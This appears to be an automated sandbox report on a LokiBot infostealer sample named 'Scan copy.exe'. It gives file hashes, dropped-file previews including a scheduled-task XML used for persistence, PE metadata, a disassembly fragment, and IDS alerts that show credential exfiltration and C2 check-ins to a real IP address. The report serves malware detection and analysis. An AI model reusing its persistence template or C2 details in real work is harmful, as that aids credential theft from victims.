                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:true
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2232
                            Entropy (8bit):5.379909843762687
                            Encrypted:false
                            SSDEEP:48:BWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:BLHxv2IfLZ2KRH6OugEs
                            MD5:8D858A903F4F5A554A798D5A9E6FC43E
                            SHA1:3422755EEA787BDA946C2C36F945A471A5A11416
                            SHA-256:5D2C99871C47D463475A7A52ABC4F23269E7D3EA03467C4AAF2252A4B45097D5
                            SHA-512:1C1C01A733B3662DA6D0380336C59DD163CF2253C8BE1A8DC0114BC49027DD496BD8DD21816B743BB09B2390303CD27BAA8A90FA403CA90072253D64D92FD704
                            Malicious:false
                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\Scan copy.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1604
                            Entropy (8bit):5.1228442075981295
                            Encrypted:false
                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZQxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTyv
                            MD5:EE75D9F54F3DB7E427F2EC759451723D
                            SHA1:A3BE41CF9FAFD0AEBB3EE9C6F21F9CFC2D3581F1
                            SHA-256:C3460504D465F26AD1A1CAF4FAA8F2C8833A4E47D347741F6F6C1F01414716E0
                            SHA-512:A6B4FEF67092956C26DD6146C7E96C79475A8F998B110AE2655708C76C8EEEF002E11D6AFBF66F6F4E996F489F7E8910FCDACC7C67A75113ECAF432433CC28B4
                            Malicious:true
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                            Process:C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1604
                            Entropy (8bit):5.1228442075981295
                            Encrypted:false
                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZQxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTyv
                            MD5:EE75D9F54F3DB7E427F2EC759451723D
                            SHA1:A3BE41CF9FAFD0AEBB3EE9C6F21F9CFC2D3581F1
                            SHA-256:C3460504D465F26AD1A1CAF4FAA8F2C8833A4E47D347741F6F6C1F01414716E0
                            SHA-512:A6B4FEF67092956C26DD6146C7E96C79475A8F998B110AE2655708C76C8EEEF002E11D6AFBF66F6F4E996F489F7E8910FCDACC7C67A75113ECAF432433CC28B4
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                            Process:C:\Users\user\Desktop\Scan copy.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Users\user\Desktop\Scan copy.exe
                            File Type:data
                            Category:modified
                            Size (bytes):50
                            Entropy (8bit):1.5212424590621707
                            Encrypted:false
                            SSDEEP:3:/lvlp:p
                            MD5:C851BF93667BDD6310D56581D955C2AE
                            SHA1:8FC5AEC1542BD7471BF815632863622EFE23A834
                            SHA-256:3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
                            SHA-512:D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
                            Malicious:false
                            Preview:........................................user.
                            Process:C:\Users\user\Desktop\Scan copy.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):721408
                            Entropy (8bit):7.783790197621609
                            Encrypted:false
                            SSDEEP:12288:K2sv+SGjpA3yKUUo6a+bJCj64DG6rGdb7XHZH/3hexOG0CesaCvzCnYb+iXw:K2xj8JCu4XrGRB/3hDRwLCnYnw
                            MD5:8C4DA707092623F03586E61F56755840
                            SHA1:69BE0CB3D2D2A7930C675449636D988F22D5F1E7
                            SHA-256:43E710D54CC34AE668A10B0CE9E89FD4F7D147CEF34C7D44275EC96BE9CFB901
                            SHA-512:A4380540EAB3BDF8C5D4A0509900A2BEBE6B2D0D2778F75A9C393119B6B75DB5144FE340913C1104447223526C2388A01A8DF82470E0E24312E09A3B1DDD5F44
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................`............@.................................8...O........Y...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....Y.......Z..................@..@.reloc.......@......................@..B................l.......H.......P<...5......$....q..PO..........................................z..}.....(........}.....(.....*..*...0............{.....+..*&...}....*...0............{....o.....+..*....0..B.........{...., .{....o....,..(....o..........+....,...(....o....oB.....*...0..B.........{...., .{....o....,..(....o..........+....,...(....o....oD.....*..r...p.{....%-.&.+.o....(....(....&*..0..E.........{....o.........,1...}.....(.....{....o ...o!.....(....o....oB.....*>..{.....o"....**...(#....*
                            Process:C:\Users\user\Desktop\Scan copy.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.783790197621609
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:Scan copy.exe
                            File size:721'408 bytes
                            MD5:8c4da707092623f03586e61f56755840
                            SHA1:69be0cb3d2d2a7930c675449636d988f22d5f1e7
                            SHA256:43e710d54cc34ae668a10b0ce9e89fd4f7d147cef34c7d44275ec96be9cfb901
                            SHA512:a4380540eab3bdf8c5d4a0509900a2bebe6b2d0d2778f75a9c393119b6b75db5144fe340913c1104447223526c2388a01a8df82470e0e24312e09a3b1ddd5f44
                            SSDEEP:12288:K2sv+SGjpA3yKUUo6a+bJCj64DG6rGdb7XHZH/3hexOG0CesaCvzCnYb+iXw:K2xj8JCu4XrGRB/3hDRwLCnYnw
                            TLSH:F5E41264529FD907C8D20BB44863E7F457749EC8E911C7079BEA7EEFB82A1572C903A0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................`............@................................
                            Icon Hash:099bce4dd131078e
                            Entrypoint:0x4ac18a
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6747D7A4 [Thu Nov 28 02:38:28 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            adc dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [esi], bh
                            add byte ptr [eax], al
                            add byte ptr [eax+00h], al
                            add byte ptr [eax], al
                            push edi
                            add byte ptr [eax], al
                            add byte ptr [ebp+00h], bl
                            add byte ptr [eax], al
                            pop edi
                            add byte ptr [eax], al
                            add byte ptr [edx+00h], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [esi], cl
                            add byte ptr [eax], al
                            add byte ptr [edi], bl
                            add byte ptr [eax], al
                            add byte ptr [edx], ch
                            add byte ptr [eax], al
                            add byte ptr [eax+eax+00h], dl
                            add byte ptr [ebx+00h], al
                            add byte ptr [eax], al
                            pop ebx
                            add byte ptr [eax], al
                            add byte ptr [eax+eax+00h], ah
                            add byte ptr [ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], al
                            add byte ptr [eax], al
                            or dword ptr [eax], eax
                            add byte ptr [eax], al
                            adc eax, 1C000000h
                            add byte ptr [eax], al
                            add byte ptr [ebx], dh
                            add byte ptr [eax], al
                            add byte ptr [edi+00h], al
                            add byte ptr [eax], al
                            push eax
                            add byte ptr [eax], al
                            add byte ptr [edi], al
                            add byte ptr [eax], al
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [ebx], dl
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], bh
                            add byte ptr [eax], al
                            sbb byte ptr [eax], al
                            add byte ptr [eax], al
                            dec ecx
                            add byte ptr [eax], al
                            add byte ptr [ebx+00h], cl
                            add byte ptr [eax], al
                            dec edi
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac1380x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x59f4.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000xaa2100xaa4002eda0402822759b6173b066f53616be8False0.9082561834618208data7.783011599815193IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xae0000x59f40x5a00877bc04b9b34c75d33ace460bc385c31False0.9311197916666667data7.858147995414986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xb40000xc0x200fab7c9655c0b5efbedb13649a231625fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xae1000x531aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.968083106138949
                            RT_GROUP_ICON0xb342c0x14data1.05
                            RT_VERSION0xb34500x3a4data0.43776824034334766
                            RT_MANIFEST0xb38040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                            DLLImport
                            mscoree.dll_CorExeMain
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-28T09:14:15.096111+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74970394.156.177.4180TCP
                            2024-11-28T09:14:15.096111+01002025381ET MALWARE LokiBot Checkin1192.168.2.74970394.156.177.4180TCP
                            2024-11-28T09:14:15.096111+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74970394.156.177.4180TCP
                            2024-11-28T09:14:16.413073+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.74970394.156.177.4180TCP
                            2024-11-28T09:14:16.856131+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74970594.156.177.4180TCP
                            2024-11-28T09:14:16.856131+01002025381ET MALWARE LokiBot Checkin1192.168.2.74970594.156.177.4180TCP
                            2024-11-28T09:14:16.856131+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74970594.156.177.4180TCP
                            2024-11-28T09:14:18.371332+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.74970594.156.177.4180TCP
                            2024-11-28T09:14:18.697511+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74970794.156.177.4180TCP
                            2024-11-28T09:14:18.697511+01002025381ET MALWARE LokiBot Checkin1192.168.2.74970794.156.177.4180TCP
                            2024-11-28T09:14:18.697511+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74970794.156.177.4180TCP
                            2024-11-28T09:14:19.966495+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74970794.156.177.4180TCP
                            2024-11-28T09:14:19.966495+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74970794.156.177.4180TCP
                            2024-11-28T09:14:20.086493+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749707TCP
                            2024-11-28T09:14:20.351381+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74970994.156.177.4180TCP
                            2024-11-28T09:14:20.351381+01002025381ET MALWARE LokiBot Checkin1192.168.2.74970994.156.177.4180TCP
                            2024-11-28T09:14:20.351381+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74970994.156.177.4180TCP
                            2024-11-28T09:14:21.741705+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74970994.156.177.4180TCP
                            2024-11-28T09:14:21.741705+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74970994.156.177.4180TCP
                            2024-11-28T09:14:21.861763+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749709TCP
                            2024-11-28T09:14:22.160780+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74971094.156.177.4180TCP
                            2024-11-28T09:14:22.160780+01002025381ET MALWARE LokiBot Checkin1192.168.2.74971094.156.177.4180TCP
                            2024-11-28T09:14:22.160780+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74971094.156.177.4180TCP
                            2024-11-28T09:14:23.475744+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74971094.156.177.4180TCP
                            2024-11-28T09:14:23.475744+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74971094.156.177.4180TCP
                            2024-11-28T09:14:23.596377+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749710TCP
                            2024-11-28T09:14:23.860632+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74971694.156.177.4180TCP
                            2024-11-28T09:14:23.860632+01002025381ET MALWARE LokiBot Checkin1192.168.2.74971694.156.177.4180TCP
                            2024-11-28T09:14:23.860632+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74971694.156.177.4180TCP
                            2024-11-28T09:14:25.137665+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74971694.156.177.4180TCP
